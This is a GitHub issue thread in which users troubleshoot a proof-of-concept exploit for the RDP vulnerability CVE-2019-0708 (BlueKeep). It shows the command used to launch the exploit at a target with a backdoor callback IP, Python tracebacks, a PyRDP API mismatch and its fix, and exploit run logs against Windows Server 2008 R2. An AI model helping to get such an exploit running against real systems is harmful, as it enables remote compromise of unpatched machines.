Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

__init__() missing 1 required positional argument: 'sessionID' #1

Open
yassineaboukir opened this issue Mar 25, 2022 · 3 comments · May be fixed by #2
Open

__init__() missing 1 required positional argument: 'sessionID' #1

yassineaboukir opened this issue Mar 25, 2022 · 3 comments · May be fixed by #2

Comments

@yassineaboukir
Copy link

Hi,

I'm running into an issue while executing the PoC. I use Python 3.8.10, Twisted-22.2.0and installed PyRDP from source (Without GUI and ffmpeg dependencies).

(venv) yassineaboukir@Yassine-2 CVE-2019-0708 % python3 exploit.py victim.com -rp 3389 <my_ip>
Traceback (most recent call last):
  File "exploit.py", line 545, in <module>
    main()
  File "exploit.py", line 535, in main
    exploit = Exploit(reactor, args.rdp_host, args.rdpport, args.backdoor_ip, args.backport)
  File "exploit.py", line 58, in __init__
    self.state = RDPMITMState(config)
TypeError: __init__() missing 1 required positional argument: 'sessionID'
@flag0
Copy link

flag0 commented Mar 28, 2022

Hi,

I'm running into an issue while executing the PoC. I use Python 3.8.10, Twisted-22.2.0and installed PyRDP from source (Without GUI and ffmpeg dependencies).

(venv) yassineaboukir@Yassine-2 CVE-2019-0708 % python3 exploit.py victim.com -rp 3389 <my_ip>
Traceback (most recent call last):
  File "exploit.py", line 545, in <module>
    main()
  File "exploit.py", line 535, in main
    exploit = Exploit(reactor, args.rdp_host, args.rdpport, args.backdoor_ip, args.backport)
  File "exploit.py", line 58, in __init__
    self.state = RDPMITMState(config)
TypeError: __init__() missing 1 required positional argument: 'sessionID'

This may be an error in the process of writing exp.
Line 58 in exp passed in

    config = MITMConfig()
    self.state = RDPMITMState(config)

And in pyrdp.mitm.state The RDPMITMStatefunction is defined as follows

class RDPMITMState:
    """
    State object for the RDP MITM. This is for data that needs to be shared across components.
    """

    def __init__(self, config: MITMConfig, sessionID: str):

https://github.com/GoSecure/pyrdp/blob/master/pyrdp/mitm/state.py

@yassineaboukir yassineaboukir linked a pull request Mar 28, 2022 that will close this issue
Open
@yassineaboukir
Copy link
Author

yassineaboukir commented Mar 28, 2022
edited
Loading

@flag0 I sent the following PR #2 to fix it - it works fine for me now.

Connected to RDP server
Sending X224ConnectionRequestPDU...
Connection confirmed
Sending MCSConnectInitialPDU...
The server selected 1
Got MCSConnectionResponsePDU
The server selected EncryptionMethod.ENCRYPTION_NONE
rdpdr <---> Channel 1004
RDPSND <---> Channel 1005
MS_T120 <---> Channel 1006
Sending MCSErectDomainRequestPDU...
Sending MCSAttachUserRequestPDU...
Got MCSAttachUserConfirmPDU
[...]

However, I'm running into the below error so not quite sure what it refers to. If anyone has insights I'd appreciate it (target is using Windows server 2008 R2).

0x4c0
0x500
0x540
0x580
0x5c0
payload size: 797
Dereference VTable
SetErrorInfoPDU{'payload': b'', 'header': ShareDataHeader{'payload': b'', 'pduType': <SlowPathPDUType.DATA_PDU: 7>, 'version': 1, 'source': 0, 'shareID': 66538, 'streamID': 1, 'uncompressedLength': 22, 'subtype': <SlowPathDataType.PDUTYPE2_SET_ERROR_INFO_PDU: 47>, 'compressedType': 0, 'compressedLength': 0}, 'errorInfo': <ErrorInfo.ERRINFO_NONE: 0>}

@nzyuko
Copy link

nzyuko commented Jun 7, 2023

did any one get this to work

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Fix missing pyrdp logging yassineaboukir/CVE-2019-0708
3 participants
@yassineaboukir @flag0 @nzyuko